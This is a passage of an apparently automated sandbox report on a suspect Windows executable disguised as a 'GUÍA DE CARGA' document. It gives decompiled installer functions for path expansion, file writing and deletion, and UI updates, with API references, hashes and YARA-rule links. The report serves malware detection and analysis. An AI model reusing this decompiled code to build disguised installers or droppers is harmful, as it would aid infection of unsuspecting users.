                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,0042B8A8,00000000,-0000000A,004093E4,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405A4C
                        • WriteFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,000000F1,?), ref: 00405A5E
                        • GlobalFree.KERNEL32 ref: 00405A65
                        • CloseHandle.KERNEL32(00000000,?,?,00000000,000000F1,?), ref: 00405A6C
                          • Part of subcall function 00405813: lstrlenA.KERNEL32(00000000,?,00000000,00000000,00405A21,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040581A
                          • Part of subcall function 00405813: lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,00405A21,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040584A
                        Strings
                        Memory Dump Source
                        • Source File: 00000001.00000002.271748606.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000001.00000002.271698513.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000001.00000002.271838429.0000000000407000.00000002.00020000.sdmp Download File
                        • Associated: 00000001.00000002.271873788.0000000000409000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272070100.000000000042C000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272095266.0000000000434000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272137068.0000000000437000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: File$Handle$CloseGlobalNamePathShortlstrlen$AddressAllocFreeModulePointerProcReadSizeWritewsprintf
                        • String ID: %s=%s$[Rename]
                        • API String ID: 3445103937-1727408572
                        • Opcode ID: abd3264898386bb3dbc1ebc44b2e1273f6261c7b2a899847ebec775b355f104e
                        • Instruction ID: 64f3c6dc45b3b00a74ff67058550f3a5a1124089509923db9c5fc79d761d9fea
                        • Opcode Fuzzy Hash: abd3264898386bb3dbc1ebc44b2e1273f6261c7b2a899847ebec775b355f104e
                        • Instruction Fuzzy Hash: 8941E131B05B166BD3206B619D89F6B3A5CDF45755F04063AFD05F22C1EA3CA8008EBE
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00405BE9, Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 197stringCOMMON
                        Download Yara Rule
                        C-Code - Quality: 74%
                        			E00405BE9(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				signed int _v8;
				struct _ITEMIDLIST* _v12;
				signed int _v16;
				signed char _v20;
				signed int _v24;
				signed char _v28;
				signed int _t36;
				CHAR* _t37;
				signed int _t39;
				int _t40;
				char _t50;
				char _t51;
				char _t53;
				char _t55;
				void* _t63;
				signed int _t69;
				intOrPtr _t73;
				signed int _t74;
				signed int _t75;
				intOrPtr _t79;
				char _t83;
				void* _t85;
				CHAR* _t86;
				void* _t88;
				signed int _t95;
				signed int _t97;
				void* _t98;

				_t88 = __esi;
				_t85 = __edi;
				_t63 = __ebx;
				_t36 = _a8;
				if(_t36 < 0) {
					_t79 =  *0x42e3fc; // 0x6e8212
					_t36 =  *(_t79 - 4 + _t36 * 4);
				}
				_t73 =  *0x42ec58; // 0x6e6884
				_t74 = _t73 + _t36;
				_t37 = 0x42dbc0;
				_push(_t63);
				_push(_t88);
				_push(_t85);
				_t86 = 0x42dbc0;
				if(_a4 - 0x42dbc0 < 0x800) {
					_t86 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				while(1) {
					_t83 =  *_t74;
					if(_t83 == 0) {
						break;
					}
					__eflags = _t86 - _t37 - 0x400;
					if(_t86 - _t37 >= 0x400) {
						break;
					}
					_t74 = _t74 + 1;
					__eflags = _t83 - 0xfc;
					_a8 = _t74;
					if(__eflags <= 0) {
						if(__eflags != 0) {
							 *_t86 = _t83;
							_t86 =  &(_t86[1]);
							__eflags = _t86;
						} else {
							 *_t86 =  *_t74;
							_t86 =  &(_t86[1]);
							_t74 = _t74 + 1;
						}
						continue;
					}
					_t39 =  *(_t74 + 1);
					_t75 =  *_t74;
					_t95 = (_t39 & 0x0000007f) << 0x00000007 | _t75 & 0x0000007f;
					_a8 = _a8 + 2;
					_v28 = _t75 | 0x00000080;
					_t69 = _t75;
					_v24 = _t69;
					__eflags = _t83 - 0xfe;
					_v20 = _t39 | 0x00000080;
					_v16 = _t39;
					if(_t83 != 0xfe) {
						__eflags = _t83 - 0xfd;
						if(_t83 != 0xfd) {
							__eflags = _t83 - 0xff;
							if(_t83 == 0xff) {
								__eflags = (_t39 | 0xffffffff) - _t95;
								E00405BE9(_t69, _t86, _t95, _t86, (_t39 | 0xffffffff) - _t95);
							}
							L41:
							_t40 = lstrlenA(_t86);
							_t74 = _a8;
							_t86 =  &(_t86[_t40]);
							_t37 = 0x42dbc0;
							continue;
						}
						__eflags = _t95 - 0x1d;
						if(_t95 != 0x1d) {
							__eflags = (_t95 << 0xa) + 0x42f000;
							E00405BC7(_t86, (_t95 << 0xa) + 0x42f000);
						} else {
							E00405B25(_t86,  *0x42ec28);
						}
						__eflags = _t95 + 0xffffffeb - 7;
						if(_t95 + 0xffffffeb < 7) {
							L32:
							E00405E29(_t86);
						}
						goto L41;
					}
					_t97 = 2;
					_t50 = GetVersion();
					__eflags = _t50;
					if(_t50 >= 0) {
						L12:
						_v8 = 1;
						L13:
						__eflags =  *0x42eca4;
						if( *0x42eca4 != 0) {
							_t97 = 4;
						}
						__eflags = _t69;
						if(_t69 >= 0) {
							__eflags = _t69 - 0x25;
							if(_t69 != 0x25) {
								__eflags = _t69 - 0x24;
								if(_t69 == 0x24) {
									GetWindowsDirectoryA(_t86, 0x400);
									_t97 = 0;
								}
								while(1) {
									__eflags = _t97;
									if(_t97 == 0) {
										goto L29;
									}
									_t51 =  *0x42ec24; // 0x74261340
									_t97 = _t97 - 1;
									__eflags = _t51;
									if(_t51 == 0) {
										L25:
										_t53 = SHGetSpecialFolderLocation( *0x42ec28,  *(_t98 + _t97 * 4 - 0x18),  &_v12);
										__eflags = _t53;
										if(_t53 != 0) {
											L27:
											 *_t86 =  *_t86 & 0x00000000;
											__eflags =  *_t86;
											continue;
										}
										__imp__SHGetPathFromIDListA(_v12, _t86);
										__imp__CoTaskMemFree(_v12);
										__eflags = _t53;
										if(_t53 != 0) {
											goto L29;
										}
										goto L27;
									}
									__eflags = _v8;
									if(_v8 == 0) {
										goto L25;
									}
									_t55 =  *_t51( *0x42ec28,  *(_t98 + _t97 * 4 - 0x18), 0, 0, _t86);
									__eflags = _t55;
									if(_t55 == 0) {
										goto L29;
									}
									goto L25;
								}
								goto L29;
							}
							GetSystemDirectoryA(_t86, 0x400);
							goto L29;
						} else {
							_t72 = (_t69 & 0x0000003f) +  *0x42ec58;
							E00405AAE(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t69 & 0x0000003f) +  *0x42ec58, _t86, _t69 & 0x00000040);
							__eflags =  *_t86;
							if( *_t86 != 0) {
								L30:
								__eflags = _v16 - 0x1a;
								if(_v16 == 0x1a) {
									lstrcatA(_t86, "\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L32;
							}
							E00405BE9(_t72, _t86, _t97, _t86, _v16);
							L29:
							__eflags =  *_t86;
							if( *_t86 == 0) {
								goto L32;
							}
							goto L30;
						}
					}
					__eflags = _t50 - 0x5a04;
					if(_t50 == 0x5a04) {
						goto L12;
					}
					__eflags = _v16 - 0x23;
					if(_v16 == 0x23) {
						goto L12;
					}
					__eflags = _v16 - 0x2e;
					if(_v16 == 0x2e) {
						goto L12;
					} else {
						_v8 = _v8 & 0x00000000;
						goto L13;
					}
				}
				 *_t86 =  *_t86 & 0x00000000;
				if(_a4 == 0) {
					return _t37;
				}
				return E00405BC7(_a4, _t37);
			}






























                        0x00405be9
                        0x00405be9
                        0x00405be9
                        0x00405bef
                        0x00405bf4
                        0x00405bf6
                        0x00405c05
                        0x00405c05
                        0x00405c07
                        0x00405c10
                        0x00405c12
                        0x00405c17
                        0x00405c1a
                        0x00405c1b
                        0x00405c22
                        0x00405c24
                        0x00405c2a
                        0x00405c2d
                        0x00405c2d
                        0x00405e06
                        0x00405e06
                        0x00405e0a
                        0x00000000
                        0x00000000
                        0x00405c3a
                        0x00405c40
                        0x00000000
                        0x00000000
                        0x00405c46
                        0x00405c47
                        0x00405c4a
                        0x00405c4d
                        0x00405df9
                        0x00405e03
                        0x00405e05
                        0x00405e05
                        0x00405dfb
                        0x00405dfd
                        0x00405dff
                        0x00405e00
                        0x00405e00
                        0x00000000
                        0x00405df9
                        0x00405c53
                        0x00405c57
                        0x00405c67
                        0x00405c6b
                        0x00405c72
                        0x00405c75
                        0x00405c79
                        0x00405c7f
                        0x00405c82
                        0x00405c85
                        0x00405c88
                        0x00405da3
                        0x00405da6
                        0x00405dd6
                        0x00405dd9
                        0x00405dde
                        0x00405de2
                        0x00405de2
                        0x00405de7
                        0x00405de8
                        0x00405ded
                        0x00405df0
                        0x00405df2
                        0x00000000
                        0x00405df2
                        0x00405da8
                        0x00405dab
                        0x00405dc0
                        0x00405dc7
                        0x00405dad
                        0x00405db4
                        0x00405db4
                        0x00405dcf
                        0x00405dd2
                        0x00405d9b
                        0x00405d9c
                        0x00405d9c
                        0x00000000
                        0x00405dd2
                        0x00405c90
                        0x00405c91
                        0x00405c97
                        0x00405c99
                        0x00405cb3
                        0x00405cb3
                        0x00405cba
                        0x00405cba
                        0x00405cc1
                        0x00405cc5
                        0x00405cc5
                        0x00405cc6
                        0x00405cc8
                        0x00405d01
                        0x00405d04
                        0x00405d14
                        0x00405d17
                        0x00405d1f
                        0x00405d25
                        0x00405d25
                        0x00405d81
                        0x00405d81
                        0x00405d83
                        0x00000000
                        0x00000000
                        0x00405d29
                        0x00405d30
                        0x00405d31
                        0x00405d33
                        0x00405d4d
                        0x00405d5b
                        0x00405d61
                        0x00405d63
                        0x00405d7e
                        0x00405d7e
                        0x00405d7e
                        0x00000000
                        0x00405d7e
                        0x00405d69
                        0x00405d74
                        0x00405d7a
                        0x00405d7c
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00405d7c
                        0x00405d35
                        0x00405d38
                        0x00000000
                        0x00000000
                        0x00405d47
                        0x00405d49
                        0x00405d4b
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00405d4b
                        0x00000000
                        0x00405d81
                        0x00405d0c
                        0x00000000
                        0x00405cca
                        0x00405ccf
                        0x00405ce5
                        0x00405cea
                        0x00405ced
                        0x00405d8a
                        0x00405d8a
                        0x00405d8e
                        0x00405d96
                        0x00405d96
                        0x00000000
                        0x00405d8e
                        0x00405cf7
                        0x00405d85
                        0x00405d85
                        0x00405d88
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00405d88
                        0x00405cc8
                        0x00405c9b
                        0x00405c9f
                        0x00000000
                        0x00000000
                        0x00405ca1
                        0x00405ca5
                        0x00000000
                        0x00000000
                        0x00405ca7
                        0x00405cab
                        0x00000000
                        0x00405cad
                        0x00405cad
                        0x00000000
                        0x00405cad
                        0x00405cab
                        0x00405e10
                        0x00405e1a
                        0x00405e26
                        0x00405e26
                        0x00000000

                        APIs
                        • GetVersion.KERNEL32(00000000,00429878,00000000,00404EEB,00429878,00000000), ref: 00405C91
                        • GetSystemDirectoryA.KERNEL32 ref: 00405D0C
                        • GetWindowsDirectoryA.KERNEL32(TclpOwkq,00000400), ref: 00405D1F
                        • SHGetSpecialFolderLocation.SHELL32(?,00419EEA), ref: 00405D5B
                        • SHGetPathFromIDListA.SHELL32(00419EEA,TclpOwkq), ref: 00405D69
                        • CoTaskMemFree.OLE32(00419EEA), ref: 00405D74
                        • lstrcatA.KERNEL32(TclpOwkq,\Microsoft\Internet Explorer\Quick Launch), ref: 00405D96
                        • lstrlenA.KERNEL32(TclpOwkq,00000000,00429878,00000000,00404EEB,00429878,00000000), ref: 00405DE8
                        Strings
                        Memory Dump Source
                        • Source File: 00000001.00000002.271748606.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000001.00000002.271698513.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000001.00000002.271838429.0000000000407000.00000002.00020000.sdmp Download File
                        • Associated: 00000001.00000002.271873788.0000000000409000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272070100.000000000042C000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272095266.0000000000434000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272137068.0000000000437000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                        • String ID: Software\Microsoft\Windows\CurrentVersion$TclpOwkq$\Microsoft\Internet Explorer\Quick Launch
                        • API String ID: 900638850-487370903
                        • Opcode ID: dad9380ef75d4ee6d1e7f44bcb98c3f3aee458906992b83e7d16e4410c3c70ab
                        • Instruction ID: 131396e9090e0f007f21196dc47e10b2e1a614011cd8a075e276219472c4ac8b
                        • Opcode Fuzzy Hash: dad9380ef75d4ee6d1e7f44bcb98c3f3aee458906992b83e7d16e4410c3c70ab
                        • Instruction Fuzzy Hash: EA510531A04A04ABEB215B65DC88BBF3BA4DF05714F10823BE911B62D1D73C59429E5E
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00405E29, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E00405E29(CHAR* _a4) {
				char _t5;
				char _t7;
				char* _t15;
				char* _t16;
				CHAR* _t17;

				_t17 = _a4;
				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
					_t17 =  &(_t17[4]);
				}
				if( *_t17 != 0 && E00405727(_t17) != 0) {
					_t17 =  &(_t17[2]);
				}
				_t5 =  *_t17;
				_t15 = _t17;
				_t16 = _t17;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((char*)(E004056E5("*?|<>/\":", _t5))) == 0) {
							E0040585F(_t16, _t17, CharNextA(_t17) - _t17);
							_t16 = CharNextA(_t16);
						}
						_t17 = CharNextA(_t17);
						_t5 =  *_t17;
					} while (_t5 != 0);
				}
				 *_t16 =  *_t16 & 0x00000000;
				while(1) {
					_t16 = CharPrevA(_t15, _t16);
					_t7 =  *_t16;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t16 =  *_t16 & 0x00000000;
					if(_t15 < _t16) {
						continue;
					}
					break;
				}
				return _t7;
			}








                        0x00405e2b
                        0x00405e33
                        0x00405e47
                        0x00405e47
                        0x00405e4d
                        0x00405e5a
                        0x00405e5a
                        0x00405e5b
                        0x00405e5d
                        0x00405e61
                        0x00405e63
                        0x00405e6c
                        0x00405e6e
                        0x00405e88
                        0x00405e90
                        0x00405e90
                        0x00405e95
                        0x00405e97
                        0x00405e99
                        0x00405e9d
                        0x00405e9e
                        0x00405ea1
                        0x00405ea9
                        0x00405eab
                        0x00405eaf
                        0x00000000
                        0x00000000
                        0x00405eb5
                        0x00405eba
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00405eba
                        0x00405ebf

                        APIs
                        • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\GU#U00cdA DE CARGA...exe" ,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403105,C:\Users\user\AppData\Local\Temp\,?,004032B8), ref: 00405E81
                        • CharNextA.USER32(?,?,?,00000000), ref: 00405E8E
                        • CharNextA.USER32(?,"C:\Users\user\Desktop\GU#U00cdA DE CARGA...exe" ,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403105,C:\Users\user\AppData\Local\Temp\,?,004032B8), ref: 00405E93
                        • CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403105,C:\Users\user\AppData\Local\Temp\,?,004032B8), ref: 00405EA3
                        Strings
                        Memory Dump Source
                        • Source File: 00000001.00000002.271748606.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000001.00000002.271698513.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000001.00000002.271838429.0000000000407000.00000002.00020000.sdmp Download File
                        • Associated: 00000001.00000002.271873788.0000000000409000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272070100.000000000042C000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272095266.0000000000434000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272137068.0000000000437000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: Char$Next$Prev
                        • String ID: "C:\Users\user\Desktop\GU#U00cdA DE CARGA...exe" $*?|<>/":$C:\Users\user\AppData\Local\Temp\
                        • API String ID: 589700163-4101701223
                        • Opcode ID: ce236f4316dc44970b3d4854ee077085f8211c330c8e5a50d5c3ec65e4e49f20
                        • Instruction ID: 6784d5a4761720cd8368ccbdd0638492f40d0cd734ea18b92361b53ebca16514
                        • Opcode Fuzzy Hash: ce236f4316dc44970b3d4854ee077085f8211c330c8e5a50d5c3ec65e4e49f20
                        • Instruction Fuzzy Hash: BA11E671804B9129EB3217248C44B7B7F89CB5A7A0F18407BE5D5722C2C77C5E429EAD
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00403EEA, Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E00403EEA(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t35;
				long _t37;
				void* _t40;
				long* _t49;

				if(_a4 + 0xfffffecd > 5) {
					L15:
					return 0;
				}
				_t49 = GetWindowLongA(_a12, 0xffffffeb);
				if(_t49 == 0) {
					goto L15;
				}
				_t35 =  *_t49;
				if((_t49[5] & 0x00000002) != 0) {
					_t35 = GetSysColor(_t35);
				}
				if((_t49[5] & 0x00000001) != 0) {
					SetTextColor(_a8, _t35);
				}
				SetBkMode(_a8, _t49[4]);
				_t37 = _t49[1];
				_v16.lbColor = _t37;
				if((_t49[5] & 0x00000008) != 0) {
					_t37 = GetSysColor(_t37);
					_v16.lbColor = _t37;
				}
				if((_t49[5] & 0x00000004) != 0) {
					SetBkColor(_a8, _t37);
				}
				if((_t49[5] & 0x00000010) != 0) {
					_v16.lbStyle = _t49[2];
					_t40 = _t49[3];
					if(_t40 != 0) {
						DeleteObject(_t40);
					}
					_t49[3] = CreateBrushIndirect( &_v16);
				}
				return _t49[3];
			}








                        0x00403efc
                        0x00403f90
                        0x00000000
                        0x00403f90
                        0x00403f0d
                        0x00403f11
                        0x00000000
                        0x00000000
                        0x00403f17
                        0x00403f20
                        0x00403f23
                        0x00403f23
                        0x00403f29
                        0x00403f2f
                        0x00403f2f
                        0x00403f3b
                        0x00403f41
                        0x00403f48
                        0x00403f4b
                        0x00403f4e
                        0x00403f50
                        0x00403f50
                        0x00403f58
                        0x00403f5e
                        0x00403f5e
                        0x00403f68
                        0x00403f6d
                        0x00403f70
                        0x00403f75
                        0x00403f78
                        0x00403f78
                        0x00403f88
                        0x00403f88
                        0x00000000

                        APIs
                        Memory Dump Source
                        • Source File: 00000001.00000002.271748606.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000001.00000002.271698513.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000001.00000002.271838429.0000000000407000.00000002.00020000.sdmp Download File
                        • Associated: 00000001.00000002.271873788.0000000000409000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272070100.000000000042C000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272095266.0000000000434000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272137068.0000000000437000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                        • String ID:
                        • API String ID: 2320649405-0
                        • Opcode ID: c17ffa4718e249222cf94fd394cb2cb31c18988dc7419d15a412fba3cf9ed351
                        • Instruction ID: d9f5f29c4b32eaf67df6904808fcf7c938901a1e5be6cbe83ca05de02e5bcf8c
                        • Opcode Fuzzy Hash: c17ffa4718e249222cf94fd394cb2cb31c18988dc7419d15a412fba3cf9ed351
                        • Instruction Fuzzy Hash: A9215471904745ABC7219F78DD08B4BBFF8AF01715F04856AE856E22E0D734EA04CB55
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 004026AF, Relevance: 10.6, APIs: 7, Instructions: 89memoryfileCOMMON
                        Download Yara Rule
                        C-Code - Quality: 86%
                        			E004026AF(struct _OVERLAPPED* __ebx) {
				void* _t27;
				long _t32;
				struct _OVERLAPPED* _t47;
				void* _t51;
				void* _t53;
				void* _t56;
				void* _t57;
				void* _t58;

				_t47 = __ebx;
				 *((intOrPtr*)(_t58 - 0xc)) = 0xfffffd66;
				_t52 = E00402A29(0xfffffff0);
				 *(_t58 - 0x38) = _t24;
				if(E00405727(_t52) == 0) {
					E00402A29(0xffffffed);
				}
				E0040587F(_t52);
				_t27 = E0040589E(_t52, 0x40000000, 2);
				 *(_t58 + 8) = _t27;
				if(_t27 != 0xffffffff) {
					_t32 =  *0x42ec34; // 0x8800
					 *(_t58 - 0x30) = _t32;
					_t51 = GlobalAlloc(0x40, _t32);
					if(_t51 != _t47) {
						E004030E2(_t47);
						E004030B0(_t51,  *(_t58 - 0x30));
						_t56 = GlobalAlloc(0x40,  *(_t58 - 0x20));
						 *(_t58 - 0x34) = _t56;
						if(_t56 != _t47) {
							E00402E8E( *((intOrPtr*)(_t58 - 0x24)), _t47, _t56,  *(_t58 - 0x20));
							while( *_t56 != _t47) {
								_t49 =  *_t56;
								_t57 = _t56 + 8;
								 *(_t58 - 0x48) =  *_t56;
								E0040585F( *((intOrPtr*)(_t56 + 4)) + _t51, _t57, _t49);
								_t56 = _t57 +  *(_t58 - 0x48);
							}
							GlobalFree( *(_t58 - 0x34));
						}
						WriteFile( *(_t58 + 8), _t51,  *(_t58 - 0x30), _t58 - 0x3c, _t47);
						GlobalFree(_t51);
						 *((intOrPtr*)(_t58 - 0xc)) = E00402E8E(0xffffffff,  *(_t58 + 8), _t47, _t47);
					}
					CloseHandle( *(_t58 + 8));
				}
				_t53 = 0xfffffff3;
				if( *((intOrPtr*)(_t58 - 0xc)) < _t47) {
					_t53 = 0xffffffef;
					DeleteFileA( *(_t58 - 0x38));
					 *((intOrPtr*)(_t58 - 4)) = 1;
				}
				_push(_t53);
				E00401423();
				 *0x42eca8 =  *0x42eca8 +  *((intOrPtr*)(_t58 - 4));
				return 0;
			}











                        0x004026af
                        0x004026b1
                        0x004026bd
                        0x004026c0
                        0x004026ca
                        0x004026ce
                        0x004026ce
                        0x004026d4
                        0x004026e1
                        0x004026e9
                        0x004026ec
                        0x004026f2
                        0x00402700
                        0x00402705
                        0x00402709
                        0x0040270c
                        0x00402715
                        0x00402721
                        0x00402725
                        0x00402728
                        0x00402732
                        0x00402751
                        0x00402739
                        0x0040273e
                        0x00402746
                        0x00402749
                        0x0040274e
                        0x0040274e
                        0x00402758
                        0x00402758
                        0x0040276a
                        0x00402771
                        0x00402783
                        0x00402783
                        0x00402789
                        0x00402789
                        0x00402794
                        0x00402795
                        0x00402799
                        0x0040279d
                        0x004027a3
                        0x004027a3
                        0x004027aa
                        0x00402197
                        0x004028c1
                        0x004028cd

                        APIs
                        • GlobalAlloc.KERNEL32(00000040,00008800,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402703
                        • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 0040271F
                        • GlobalFree.KERNEL32 ref: 00402758
                        • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,000000F0), ref: 0040276A
                        • GlobalFree.KERNEL32 ref: 00402771
                        • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 00402789
                        • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040279D
                        Memory Dump Source
                        • Source File: 00000001.00000002.271748606.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000001.00000002.271698513.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000001.00000002.271838429.0000000000407000.00000002.00020000.sdmp Download File
                        • Associated: 00000001.00000002.271873788.0000000000409000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272070100.000000000042C000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272095266.0000000000434000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272137068.0000000000437000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                        • String ID:
                        • API String ID: 3294113728-0
                        • Opcode ID: 87c57808f8dc4d746d59b2b3a4cb472afbcf4a509c6767706d62590f2872af51
                        • Instruction ID: 7359f6b8c72d8bce8f96c3519292fde75c250a44c6e0f48ea69dd088617f1d2a
                        • Opcode Fuzzy Hash: 87c57808f8dc4d746d59b2b3a4cb472afbcf4a509c6767706d62590f2872af51
                        • Instruction Fuzzy Hash: 9D319C71C00028BBCF216FA5DE88DAEBA79EF04364F14423AF914762E0C67949018B99
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00404EB3, Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E00404EB3(CHAR* _a4, CHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				CHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				CHAR* _t26;
				signed int _t27;
				CHAR* _t28;
				long _t29;
				signed int _t39;

				_t26 =  *0x42e404; // 0x0
				_v8 = _t26;
				if(_t26 != 0) {
					_t27 =  *0x42ecd4; // 0x0
					_v12 = _t27;
					_t39 = _t27 & 0x00000001;
					if(_t39 == 0) {
						E00405BE9(0, _t39, 0x429878, 0x429878, _a4);
					}
					_t26 = lstrlenA(0x429878);
					_a4 = _t26;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t26 = SetWindowTextA( *0x42e3e8, 0x429878);
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x429878;
							_v52 = 1;
							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t29 - _t39;
							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
						}
						if(_t39 != 0) {
							_t28 = _a4;
							 *((char*)(_t28 + 0x429878)) = 0;
							return _t28;
						}
					} else {
						_t26 =  &(_a4[lstrlenA(_a8)]);
						if(_t26 < 0x800) {
							_t26 = lstrcatA(0x429878, _a8);
							goto L6;
						}
					}
				}
				return _t26;
			}

















                        0x00404eb9
                        0x00404ec5
                        0x00404ec8
                        0x00404ece
                        0x00404eda
                        0x00404edd
                        0x00404ee0
                        0x00404ee6
                        0x00404ee6
                        0x00404eec
                        0x00404ef4
                        0x00404ef7
                        0x00404f14
                        0x00404f18
                        0x00404f21
                        0x00404f21
                        0x00404f2b
                        0x00404f34
                        0x00404f40
                        0x00404f47
                        0x00404f4b
                        0x00404f4e
                        0x00404f61
                        0x00404f6f
                        0x00404f6f
                        0x00404f73
                        0x00404f75
                        0x00404f78
                        0x00000000
                        0x00404f78
                        0x00404ef9
                        0x00404f01
                        0x00404f09
                        0x00404f0f
                        0x00000000
                        0x00404f0f
                        0x00404f09
                        0x00404ef7
                        0x00404f82

                        APIs
                        • lstrlenA.KERNEL32(00429878,00000000,00419EEA,7519EA30,?,?,?,?,?,?,?,?,?,00402FE9,00000000,?), ref: 00404EEC
                        • lstrlenA.KERNEL32(00402FE9,00429878,00000000,00419EEA,7519EA30,?,?,?,?,?,?,?,?,?,00402FE9,00000000), ref: 00404EFC
                        • lstrcatA.KERNEL32(00429878,00402FE9,00402FE9,00429878,00000000,00419EEA,7519EA30), ref: 00404F0F
                        • SetWindowTextA.USER32(00429878,00429878), ref: 00404F21
                        • SendMessageA.USER32 ref: 00404F47
                        • SendMessageA.USER32 ref: 00404F61
                        • SendMessageA.USER32 ref: 00404F6F
                        Memory Dump Source
                        • Source File: 00000001.00000002.271748606.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000001.00000002.271698513.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000001.00000002.271838429.0000000000407000.00000002.00020000.sdmp Download File
                        • Associated: 00000001.00000002.271873788.0000000000409000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272070100.000000000042C000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272095266.0000000000434000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272137068.0000000000437000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: MessageSend$lstrlen$TextWindowlstrcat
                        • String ID:
                        • API String ID: 2531174081-0
                        • Opcode ID: eb6caf3ac7484f5f1db1ef618e0e0cbe7ab290b61210ffb6096f31fecf2f81c8
                        • Instruction ID: b2aff46cb4fd7b93265c813df518c908744a9a116baeb32a25c95395085da7a4
                        • Opcode Fuzzy Hash: eb6caf3ac7484f5f1db1ef618e0e0cbe7ab290b61210ffb6096f31fecf2f81c8
                        • Instruction Fuzzy Hash: BA219D71900118BFDB119FA5CD80DDEBFB9EF45354F14807AF544B62A0C739AE408BA8
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00404782, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                        Download Yara Rule
